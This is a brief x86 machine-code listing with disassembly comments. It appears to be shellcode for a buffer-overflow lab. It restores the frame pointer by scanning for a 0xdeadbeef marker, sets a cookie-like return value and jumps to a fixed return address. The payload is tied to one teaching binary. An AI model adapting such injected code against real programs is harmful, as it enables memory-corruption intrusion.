   	68 2d 8e 04 08     /*  	push   $0x8048e2d */
   	53                 /*  	push   %ebx */
   	89 e5              /*  	mov    %esp,%ebp */ 
   	83 c5 04           /*  	add    $0x4,%ebp */
   	8b 5d 00           /*  	mov    0x0(%ebp),%ebx */
   	81 fb ef be ad de  /*  	cmp    $0xdeadbeef,%ebx */
	75 f2		   /*   jne	(-14 : PC-relative) */
	83 c5 0c           /*  	add    $0xc,%ebp */
  	b8 37 26 18 62     /*  	mov    $0x62182637,%eax */
  	5b                 /*  	pop    %ebx */
  	c3                 /*  	ret     */
